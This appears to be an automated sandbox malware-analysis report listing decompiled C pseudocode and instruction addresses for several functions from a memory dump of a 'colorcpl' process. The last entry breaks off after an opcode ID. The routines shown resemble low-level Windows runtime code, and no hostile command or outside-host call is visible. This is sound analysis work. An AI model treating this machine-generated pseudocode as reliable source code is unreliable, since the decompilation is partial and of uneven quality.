0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55f77febb81fac23f0ee66dbdda891096934d6097880c09bb61cbabeb84123c
Instruction ID: 31c78d685fbdd2ac059f9edb5506b65cb807938a7e7bfc1d4db96525b8cab756
Opcode Fuzzy Hash: f55f77febb81fac23f0ee66dbdda891096934d6097880c09bb61cbabeb84123c
Instruction Fuzzy Hash: A351C1B12047019FF720EF65D884FAB77E8EF85729F10162DEA6197691D734F8008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 043694FA Relevance: .2, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E043694FA(signed int __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				signed int _v113;
				void* _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				signed int _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t64;
				void* _t73;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				intOrPtr* _t91;
				intOrPtr* _t92;
				signed int _t93;

				_t90 = __edx;
				_t85 = __ecx;
				_v8 =  *0x443b370 ^ _t93;
				_t92 = _a8;
				_t91 = __edx;
				_v140 = __ecx;
				_v136 = __edx;
				if(__edx == 0) {
					L31:
					 *_t92 = 0xc000005a;
					L32:
					_t52 = 0;
					L8:
					return E04384B50(_t52, _t80, _v8 ^ _t93, _t90, _t91, _t92);
				}
				_t80 = _a4;
				if(_t80 != 0) {
					_push( &_v120);
					_push(8);
					_push(0xffffffff);
					_t55 = E04383C30();
					 *_t92 = _t55;
					if(_t55 < 0) {
						goto L32;
					}
					L3:
					_v128 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
					_push( &_v124);
					_push(0x4c);
					_push( &_v92);
					_push(1);
					_push(_v120);
					_t60 = E04382BC0();
					 *_t92 = _t60;
					if(_t60 < 0) {
						L27:
						if(_t80 != 0) {
							_push(_v120);
							E04382A80();
						}
						goto L32;
					}
					if(E04368600(_t91, _v92) == 0) {
						_push( &_v124);
						_push(0);
						_push(0);
						_push(2);
						_push(_v120);
						_t64 = E04382BC0();
						 *_t92 = _t64;
						if(_t64 >= 0 || _t64 == 0xc0000023) {
							_t91 = E04355D90(_t85, _v128, 0, _v124);
							if(_t91 == 0) {
								 *_t92 = 0xc0000017;
								goto L27;
							}
							_push( &_v124);
							_push(_v124);
							_push(_t91);
							_push(2);
							_push(_v120);
							 *_t92 = E04382BC0();
							if(_t80 != 0) {
								_push(_v120);
								E04382A80();
							}
							if( *_t92 < 0) {
								_t80 = 0;
								goto L21;
							} else {
								_t81 = 0;
								if( *_t91 <= 0) {
									L30:
									E04353BC0(_v128, 0, _t91);
									_v100 = _v100 & 0x00000000;
									_v96 = _v96 & 0x00000000;
									_push( &_v113);
									_v104 = 0x12;
									_push( &_v112);
									_push(_v140);
									_t80 = 1;
									_v112 = 1;
									_v108 = 1;
									_t73 = E04383D20();
									_t47 =  &_v113;
									 *_t47 = _v113 & (_t85 & 0xffffff00 | _t73 < 0x00000000) - 0x00000001;
									if( *_t47 != 0) {
										L7:
										_t52 = _t80;
										goto L8;
									}
									goto L31;
								}
								_t21 = _t91 + 4; // 0x4
								_t74 = _t21;
								_v132 = _t21;
								while(E04368600(_v136,  *_t74) == 0) {
									_t81 = _t81 + 1;
									_t74 = _v132 + 8;
									_v132 = _v132 + 8;
									if(_t81 <  *_t91) {
										continue;
									}
									goto L30;
								}
								if(( *(_t91 + 8 + _t81 * 8) & 0x00000018) != 8) {
									goto L30;
								}
								_t80 = 1;
								L21:
								E04353BC0(_v128, 0, _t91);
								goto L7;
							}
						} else {
							goto L27;
						}
					}
					if(_t80 != 0) {
						_push(_v120);
						E04382A80();
					}
					_t80 = 1;
					goto L7;
				}
				_v120 = __ecx;
				goto L3;
			}

0x043694fa
0x043694fa
0x0436950c
0x04369511
0x04369517
0x04369519
0x0436951f
0x04369527
0x043ada8b
0x043ada8b
0x043ada91
0x043ada91
0x0436957f
0x0436958d
0x0436958d
0x0436952d
0x04369532
0x043ada02
0x043ada03
0x043ada05
0x043ada07
0x043ada0c
0x043ada10
0x00000000
0x00000000
0x0436953b
0x04369544
0x0436954a
0x0436954b
0x04369550
0x04369551
0x04369553
0x04369556
0x0436955b
0x0436955f
0x043ada2a
0x043ada2c
0x043ada2e
0x043ada31
0x043ada31
0x00000000
0x043ada2c
0x04369570
0x04369593
0x04369594
0x04369596
0x04369598
0x0436959a
0x0436959d
0x043695a2
0x043695a6
0x043695c0
0x043695c4
0x043ada24
0x00000000
0x043ada24
0x043695cd
0x043695ce
0x043695d1
0x043695d2
0x043695d4
0x043695dc
0x043695e0
0x043ada38
0x043ada3b
0x043ada3b
0x043695e9
0x04369640
0x00000000
0x043695eb
0x043695eb
0x043695ef
0x043ada45
0x043ada4b
0x043ada50
0x043ada57
0x043ada5d
0x043ada61
0x043ada68
0x043ada69
0x043ada6f
0x043ada70
0x043ada73
0x043ada76
0x043ada82
0x043ada82
0x043ada85
0x0436957d
0x0436957d
0x00000000
0x0436957d
0x00000000
0x043ada85
0x043695f5
0x043695f5
0x043695f8
0x043695fb
0x0436960f
0x04369610
0x04369613
0x04369618
0x00000000
0x00000000
0x00000000
0x0436961a
0x04369627
0x00000000
0x00000000
0x0436962f
0x04369630
0x04369636
0x00000000
0x04369636
0x00000000
0x00000000
0x00000000
0x043695a6
0x04369574
0x043ada17
0x043ada1a
0x043ada1a
0x0436957c
0x00000000
0x0436957c
0x04369538
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0552f6d2affeadbdbe4e3bb29d6934d59538105ef0138a9ca45627d01c5b294
Instruction ID: 1a6649872c0179228e5f9efd5aed911ffac658485ba6b82af5ffe08c1504c3f1
Opcode Fuzzy Hash: b0552f6d2affeadbdbe4e3bb29d6934d59538105ef0138a9ca45627d01c5b294
Instruction Fuzzy Hash: 2751B170A4430AAFEB21AFA4CC80BEDBBB9EF44314F205029E991A7151EB71A914DF10

Uniqueness

Uniqueness Score: -1.00%

Function 04353660 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E04353660(intOrPtr __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				void* __ebx;
				unsigned int _t54;
				signed int _t87;
				intOrPtr* _t89;
				char* _t90;
				intOrPtr _t102;
				signed int _t103;
				void* _t105;
				unsigned int _t112;
				unsigned int _t118;
				unsigned int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				unsigned int _t127;

				_v12 = __ecx;
				_v5 = __edx;
				_t54 = ((__edx & 0x000000ff) << 5) + __ecx;
				_v16 = _t54;
				_t123 = _t54 - 0xa8;
				 *(_t123 + 0x14) =  *(_t123 + 0x14) + 1;
				_t101 = 0x4434f60 + (_t123 >> 0x00000002 & 0x0000001f) * 4;
				L04352330(_t123 >> 0x00000002 & 0x0000001f, 0x4434f60 + (_t123 >> 0x00000002 & 0x0000001f) * 4);
				_t124 =  *_t123;
				if(_t124 != 0) {
					 *_t123 =  *_t124;
					 *((intOrPtr*)(_t123 + 4)) =  *((intOrPtr*)(_t123 + 4)) + 0xffff;
				}
				E043524D0(_t101);
				_t102 = _v5;
				if(_t124 == 0) {
					if(_t102 <= 7) {
						L16:
						_t125 = E043501F1( *((intOrPtr*)(_v12 + 0xc)), _t102, _a4, _a8);
						if(_t125 != 0) {
							asm("lock inc dword [eax]");
						}
						L11:
						_t118 =  *(_t123 + 0x14) & 0x0000ffff;
						if(_t118 > 0x40) {
							_t103 =  *(_t123 + 0x18) & 0x0000ffff;
							if(_t118 >= (( *(_t123 + 0x16) & 0x0000ffff) >> 1) + ( *(_t123 + 0x16) & 0x0000ffff) || _t103 >= _t118 - (_t118 >> 1)) {
								L22:
								 *(_t123 + 0x14) = 0;
								 *(_t123 + 0x16) = 0;
								 *(_t123 + 0x18) = 0;
								goto L12;
							} else {
								if( *((intOrPtr*)(_t123 + 0xc)) >= 2) {
									if( *((intOrPtr*)(_t123 + 0x10)) <= 2) {
										goto L22;
									}
									L25:
									asm("lock cmpxchg [edx], ecx");
									goto L22;
								}
								goto L25;
							}
						}
						L12:
						return _t125;
					}
					_t127 = _v16 + 0xffffff38;
					_v16 = _t127;
					_v20 = 0x4434f60 + (_t127 >> 0x00000002 & 0x0000001f) * 4;
					L04352330(0x4434f60 + (_t127 >> 0x00000002 & 0x0000001f) * 4, 0x4434f60 + (_t127 >> 0x00000002 & 0x0000001f) * 4);
					_t125 =  *_t127;
					if(_t125 != 0) {
						_t112 = _v16;
						 *_t112 =  *_t125;
						 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t112 + 4)) + 0xffff;
					}
					E043524D0(_v20);
					if(_t125 != 0) {
						_t102 = _t102 - 1;
						L4:
						if(_t125 == 0) {
							goto L16;
						}
						_t87 = 1 <<  *(_t125 + 8);
						if(1 > 0x78000) {
							_t87 = 0x78000;
						}
						_t105 = ( *(_t125 + 0xa) & 0x0000ffff) + _t87;
						_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
						if(_t89 != 0) {
							if( *_t89 == 0) {
								goto L8;
							}
							_t90 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							goto L9;
						} else {
							L8:
							_t90 = 0x7ffe0380;
							L9:
							if( *_t90 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
									E043FF4FD(_t105,  *((intOrPtr*)(_v12 + 0xc)), _t125, _t105, _a4);
								}
							}
							asm("lock xadd [eax], ebx");
							goto L11;
						}
					} else {
						goto L16;
					}
				}
				 *(_t123 + 0x18) =  *(_t123 + 0x18) + 1;
				goto L4;
			}

0x0435366a
0x0435366d
0x04353676
0x0435367a
0x0435367e
0x0435368a
0x04353696
0x0435369e
0x043536a3
0x043536a7
0x043536ab
0x043536b2
0x043536b2
0x043536b7
0x043536bc
0x043536c1
0x0435373a
0x04353772
0x04353785
0x04353789
0x04353797
0x04353797
0x0435371c
0x04353720
0x04353726
0x043537b9
0x043537c5
0x043537d1
0x043537d3
0x043537d7
0x043537db
0x00000000
0x043537e4
0x043537ed
0x043a6849
0x00000000
0x00000000
0x043537f6
0x043537f6
0x00000000
0x043537f6
0x00000000
0x043537f3
0x043537c5
0x0435372d
0x04353734
0x04353734
0x0435373f
0x04353747
0x04353758
0x0435375b
0x04353760
0x04353764
0x0435379c
0x043537a1
0x043537a8
0x043537a8
0x04353769
0x04353770
0x043537ae
0x043536cd
0x043536cf
0x00000000
0x00000000
0x043536dd
0x043536e4
0x043536e6
0x043536e6
0x043536ef
0x043536f7
0x043536fc
0x043a67fe
0x00000000
0x00000000
0x043a680d
0x00000000
0x04353702
0x04353702
0x04353702
0x04353707
0x0435370a
0x043a6824
0x043a6836
0x043a6836
0x043a6824
0x04353718
0x00000000
0x04353718
0x00000000
0x00000000
0x00000000
0x04353770
0x043536c9
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4a325c2000ab2fd3adcb7d9be0665923bb105421ff1b355a9eef96b843852e
Instruction ID: 28ab9439e675652595f79019e12d9360387f02e534b6419cd99230a31a1390e4
Opcode Fuzzy Hash: ac4a325c2000ab2fd3adcb7d9be0665923bb105421ff1b355a9eef96b843852e
Instruction Fuzzy Hash: 4451DAB6E10A56ABC7118F68C880AAAB7B4FF04750F1556A9EC45CB760E734F991CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04347072 Relevance: .2, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04347072(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				signed int* _t58;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t106;
				void* _t112;
				intOrPtr _t113;

				_t112 = __edx;
				_v24 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t113 =  *((intOrPtr*)(__edx + 0x58));
				if(_t113 != 0) {
					_push( &_v16);
					_push(0);
					_push(0);
					E043785E0(_t86, __edx, __edx, _t113, __eflags);
				}
				_t87 = _t112 + 0x8c;
				_t92 =  *_t87;
				do {
					_t106 = _t92;
					_t51 = _t92 >> 1;
					if(_t51 == 0) {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
					} else {
						_v12 = 1;
						_v8 = 1;
						if((_t92 & 0x00000001 | _t51 * 0x00000002 - 0x00000002) < 2) {
							_v8 = _v8 & 0x00000000;
						}
					}
					asm("lock cmpxchg [ebx], ecx");
					_t92 = _t106;
				} while (_t92 != _t106);
				_t88 = _t87 | 0xffffffff;
				if(_t113 != 0) {
					__eflags = _v12;
					if(__eflags != 0) {
						__eflags = E04362120(_t88, _t92, 0, _t113);
						if(__eflags >= 0) {
							_t82 = _v24;
							_t33 = _t82 + 0x50;
							 *_t33 =  *(_t82 + 0x50) | 0x00000100;
							__eflags =  *_t33;
							 *((intOrPtr*)(_t82 + 0x64)) = _t113;
						} else {
							_v12 = _v12 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_v20 = 1;
						}
					}
					_push(_v16);
					_push(0);
					E0437A6D0(_t88, _t112, _t113, __eflags);
					__eflags = _v20;
					if(_v20 != 0) {
						E0436DB40(_t112 + 0x20, _t88, 0);
						E04414600(_t112);
					}
				}
				if(_v8 != 0) {
					_push(2);
					asm("lock xadd [edi], eax");
					_t55 = E04353C40();
					__eflags = _t55;
					if(_t55 != 0) {
						_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t58 = 0x7ffe0386;
					}
					__eflags =  *_t58;
					if( *_t58 != 0) {
						E04414BE0( *((intOrPtr*)(_t112 + 0x5c)), _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x30)),  *((intOrPtr*)(_t112 + 0x34)),  *((intOrPtr*)(_t112 + 0x3c)));
					}
					_push(0);
					_push( *((intOrPtr*)(_t112 + 0x74)));
					E04351C8F(_t88, _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x5c)), _t112);
					asm("lock xadd [edi], eax");
					if(__eflags == 0) {
						 *0x44391e0(_t112);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
					}
				}
				if(_a4 != 0) {
					__eflags = E04341F36(0);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t112 + 0x70)) = _v0;
						asm("lock xadd [edi], eax");
						if(__eflags == 0) {
							 *0x44391e0(_t112);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
						}
					}
				}
				if(_v12 != 0) {
					E04347007(_v24, _t112);
					return 1;
				}
				asm("lock xadd [edi], ebx");
				__eflags = _t88 == 1;
				if(_t88 == 1) {
					 *0x44391e0(_t112);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
				}
				return 0;
			}

0x0434707d
0x0434707f
0x04347084
0x04347087
0x0434708a
0x0434708f
0x043a1534
0x043a1535
0x043a1536
0x043a1537
0x043a1537
0x04347095
0x0434709b
0x0434709d
0x0434709f
0x043470a1
0x043470a3
0x043a1541
0x043a1545
0x043470a9
0x043470b0
0x043470bf
0x043470c5
0x043470c7
0x043470cb
0x043470c5
0x043470cf
0x043470d3
0x043470d5
0x043470d9
0x043470de
0x043a1551
0x043a1555
0x043a155f
0x043a1561
0x043a1574
0x043a1577
0x043a1577
0x043a1577
0x043a157e
0x043a1563
0x043a1563
0x043a1567
0x043a156b
0x043a156b
0x043a1561
0x043a1581
0x043a1584
0x043a1586
0x043a158b
0x043a158f
0x043a159c
0x043a15a2
0x043a15a2
0x043a158f
0x043470e8
0x0434710e
0x04347111
0x04347115
0x0434711a
0x0434711c
0x043a15b5
0x04347122
0x04347122
0x04347122
0x04347129
0x0434712b
0x043a15ce
0x043a15ce
0x04347137
0x04347139
0x0434713c
0x04347143
0x04347147
0x043a15e0
0x043a15e6
0x043a15e6
0x04347147
0x043470ee
0x04347157
0x04347159
0x0434715e
0x04347163
0x04347167
0x043a15f5
0x043a15fb
0x043a15fb
0x04347167
0x04347159
0x043470f4
0x043470ff
0x00000000
0x04347106
0x043a1602
0x043a1606
0x043a1607
0x043a1611
0x043a1617
0x043a1617
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124062a6a69c6ebd3cd1b6276914b821658ddf0badb9f49a4c341b8908f30db5
Instruction ID: 641b289b1817317f1385ed07e1f02df656cda26425498d160a59b29e39564b1c
Opcode Fuzzy Hash: 124062a6a69c6ebd3cd1b6276914b821658ddf0badb9f49a4c341b8908f30db5
Instruction Fuzzy Hash: 5051DD70A00A05EFEF15DFA4C884BADB7B8FF84315F10916AE512A7690EB74B911DF80

Uniqueness

Uniqueness Score: -1.00%

Function 043644D1 Relevance: .2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E043644D1(char __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v5;
				char _v6;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t84;
				signed short _t87;
				void* _t88;
				void* _t92;
				signed int _t94;
				void* _t105;
				char _t107;

				_v6 = __ecx;
				_v12 = 0;
				_t107 = 0;
				_v36 = 0;
				_t105 = __edx;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if(_a4 == 0) {
					L25:
					_t56 = 0xc000000d;
				} else {
					_t57 = _a8;
					if(_t57 == 0 ||  *_t57 == 0 || __edx == 0) {
						goto L25;
					} else {
						_t84 = E04355D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x1fe);
						if(_t84 == 0) {
							_t56 = 0xc0000017;
						} else {
							_t10 = _t84 + 0xaa; // 0xaa
							_v44 = 0xaa0000;
							_v40 = _t10;
							if(E04365DC0( &_v16, _t105) < 0 || E04364F40(_v16 & 0x0000ffff,  &_v44) == 0) {
								_t107 = 0xc0000001;
							} else {
								_t68 = _a4;
								_t87 = 0;
								_v20 = _v20 & 0;
								if(0 <  *(_a4 + 4)) {
									_v16 = 0;
									while(1) {
										_v32 = _t84;
										_v36 = 0xaa0000;
										_t88 = _t105;
										_t107 = E04364443(_t88,  *((intOrPtr*)(_t68 + 0x10)) + _t87,  &_v36);
										if(_t107 < 0) {
											goto L19;
										}
										_push(_t88);
										_t107 = E04365497(_a8, _t105, 0,  &_v12, _v32);
										if(_t107 >= 0) {
											if(_v6 == 0) {
												if(E043879A0(_v32, _v40) == 0) {
													goto L12;
												} else {
													goto L18;
												}
												L26:
											} else {
												L12:
												_t30 = _t84 + 0x154; // 0x154
												_v24 = _t30;
												_t92 = _t105;
												_v5 = 0;
												_v28 = 0xaa0000;
												_t107 = E04364693(_t92, _v32,  &_v28,  &_v5);
												if(_t107 >= 0) {
													while(_v28 > 0 && _v5 == 0) {
														_push(_t92);
														_t107 = E04365497(_a8, _t105, 0,  &_v12, _v24);
														if(_t107 >= 0) {
															_t92 = _t105;
															_t107 = E04364693(_t92, _v24,  &_v28,  &_v5);
															if(_t107 >= 0) {
																continue;
															} else {
																break;
															}
														}
														goto L19;
													}
													if(_t107 >= 0) {
														L18:
														_v16 = _v16 + 6;
														_t94 = _v20 + 1;
														_v20 = _t94;
														_t68 = _a4;
														_t87 = _v16;
														if(_t94 < ( *(_a4 + 4) & 0x0000ffff)) {
															continue;
														}
													}
												}
											}
										}
										goto L19;
									}
								}
							}
							L19:
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
							_t56 = _t107;
						}
					}
				}
				return _t56;
				goto L26;
			}

0x043644dd
0x043644e2
0x043644e6
0x043644e8
0x043644ec
0x043644ee
0x043644f1
0x043644f4
0x043644fa
0x043ab4ea
0x043ab4ea
0x04364500
0x04364500
0x04364505
0x00000000
0x0436451b
0x04364530
0x04364534
0x043ab4d6
0x0436453a
0x0436453a
0x04364540
0x04364547
0x04364556
0x043ab4e0
0x04364572
0x04364572
0x04364575
0x04364577
0x0436457e
0x04364584
0x04364587
0x0436458a
0x04364593
0x0436459a
0x043645a1
0x043645a5
0x00000000
0x00000000
0x043645ab
0x043645bf
0x043645c3
0x043645cd
0x0436468b
0x00000000
0x04364691
0x00000000
0x04364691
0x00000000
0x043645d3
0x043645d3
0x043645d6
0x043645dc
0x043645df
0x043645e4
0x043645ec
0x043645f9
0x043645fd
0x043645ff
0x0436460c
0x04364620
0x04364624
0x04364630
0x04364638
0x0436463c
0x00000000
0x00000000
0x00000000
0x00000000
0x0436463c
0x00000000
0x04364624
0x04364640
0x04364642
0x04364648
0x0436464c
0x0436464d
0x04364656
0x04364659
0x0436465c
0x00000000
0x00000000
0x0436465c
0x04364640
0x043645fd
0x043645cd
0x00000000
0x043645c3
0x04364587
0x0436457e
0x04364662
0x0436466e
0x04364673
0x04364673
0x04364534
0x04364505
0x04364679
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction ID: 769e267ff7e9233c76503f9b6d8ec25b3d22d8efba31d082c795481c8756d220
Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction Fuzzy Hash: B151B171E0021AAFEF11DF94C450BEEBBB9EF54714F149069EA02AB244DB34F944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 043CE660 Relevance: .2, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E043CE660(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v8;
				signed int _v12;
				char _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				signed int* _v36;
				char _v40;
				void* _t44;
				void* _t47;
				void* _t53;
				void* _t57;
				signed int _t60;
				void* _t66;
				signed int* _t67;
				void* _t68;
				signed int* _t76;
				signed int* _t77;
				void* _t78;
				void* _t79;
				signed int* _t80;

				_v12 = _v12 | 0xffffffff;
				_t67 = 0;
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				if(_a12 == 1) {
					_push(_a4);
					_push(0x8000000);
					_push(2);
					_push(0);
					_push(0);
					_push(0xf0005);
					_push( &_v12);
					_t44 = E04382E50();
					if(_v12 == 0xffffffff || _t44 < 0) {
						_t78 = 0xc0000008;
						goto L27;
					} else {
						_push(2);
						_push(0);
						_push(1);
						_v40 = 0;
						_push( &_v24);
						_v36 = 0;
						_push( &_v40);
						_push(0);
						_push(0);
						_v24 = 0;
						_push( &_v8);
						_push(0xffffffff);
						_push(_v12);
						_t53 = E04382C30();
						_push(_v12);
						_t79 = _t53;
						E04382A80();
						_t70 = _v8;
						if(_v8 == 0 || _t79 < 0) {
							_t78 = 0xc0000019;
							goto L27;
						} else {
							_t57 = E0434E4B0(_t70, 0, 1,  &_v32,  &_v20);
							if(_t57 >= 0) {
								_t77 = _v20;
								L11:
								_t68 = E0434B920(_t70, _v8);
								if(_t77 == 0) {
									L21:
									_t78 = E043CE542(_v16, _a8);
									L22:
									_t67 = 0;
									L27:
									E043CE4F2(_v16);
									if(_v8 != 0) {
										_push(_v8);
										_push(0xffffffff);
										_t47 = E04382C50();
										if(_t47 < 0 && _t47 == 0xc0000045 && E043EE670(_v8, _t67) != 0) {
											_push(_v8);
											_push(0xffffffff);
											E04382C50();
										}
									}
									return _t78;
								}
								while( *((intOrPtr*)(_t77 + 0xc)) != 0 &&  *((intOrPtr*)(_t77 + 0x10)) != 0) {
									_t60 = E04349630(_t68, _v8,  *((intOrPtr*)(_t77 + 0xc)));
									_v28 = _t60;
									if(_t60 == 0) {
										_t78 = 0xc000008b;
										goto L22;
									}
									_t80 = E04355D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc);
									if(_t80 == 0) {
										_t78 = 0xc0000017;
										goto L22;
									}
									_t80[2] = _t80[2] & 0x00000000;
									 *_t80 =  *_t80 & 0x00000000;
									_t80[1] = _v28;
									E043CE5FE(_t80,  &_v16);
									_t76 = _v8;
									_t70 = _t80;
									_push(_t77);
									_push(_t68);
									if( *((intOrPtr*)(_t68 + 0x18)) != 0x10b) {
										_t66 = E043CE461(_t70, _t76);
									} else {
										_t66 = E043CE3DD(_t70, _t76);
									}
									_t78 = _t66;
									if(_t78 < 0) {
										goto L22;
									} else {
										_t77 = _t77 + 0x14;
										if(_t77 != 0) {
											continue;
										}
										goto L21;
									}
								}
								goto L21;
							}
							if(_t57 != 0xc0000002) {
								_t78 = 0xc0000089;
								goto L27;
							}
							_t77 = 0;
							goto L11;
						}
					}
				}
				_t78 = 0xc0000058;
				goto L27;
			}

0x043ce668
0x043ce66d
0x043ce675
0x043ce678
0x043ce67b
0x043ce67e
0x043ce68a
0x043ce690
0x043ce695
0x043ce697
0x043ce698
0x043ce699
0x043ce69e
0x043ce69f
0x043ce6a8
0x043ce7d1
0x00000000
0x043ce6b6
0x043ce6b6
0x043ce6b8
0x043ce6b9
0x043ce6be
0x043ce6c1
0x043ce6c5
0x043ce6c8
0x043ce6c9
0x043ce6ca
0x043ce6ce
0x043ce6d1
0x043ce6d2
0x043ce6d4
0x043ce6d7
0x043ce6dc
0x043ce6df
0x043ce6e1
0x043ce6e6
0x043ce6eb
0x043ce7ca
0x00000000
0x043ce6f9
0x043ce705
0x043ce70c
0x043ce723
0x043ce726
0x043ce72e
0x043ce732
0x043ce7ab
0x043ce7b6
0x043ce7b8
0x043ce7b8
0x043ce7d6
0x043ce7d9
0x043ce7e2
0x043ce7e4
0x043ce7e7
0x043ce7e9
0x043ce7f0
0x043ce806
0x043ce809
0x043ce80b
0x043ce80b
0x043ce7f0
0x043ce816
0x043ce816
0x043ce734
0x043ce747
0x043ce74c
0x043ce751
0x043ce7c3
0x00000000
0x043ce7c3
0x043ce765
0x043ce769
0x043ce7bc
0x00000000
0x043ce7bc
0x043ce771
0x043ce777
0x043ce77a
0x043ce77d
0x043ce782
0x043ce78a
0x043ce78c
0x043ce78d
0x043ce792
0x043ce79b
0x043ce794
0x043ce794
0x043ce794
0x043ce7a0
0x043ce7a4
0x00000000
0x043ce7a6
0x043ce7a6
0x043ce7a9
0x00000000
0x00000000
0x00000000
0x043ce7a9
0x043ce7a4
0x00000000
0x043ce734
0x043ce713
0x043ce719
0x00000000
0x043ce719
0x043ce715
0x00000000
0x043ce715
0x043ce6eb
0x043ce6a8
0x043ce680
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
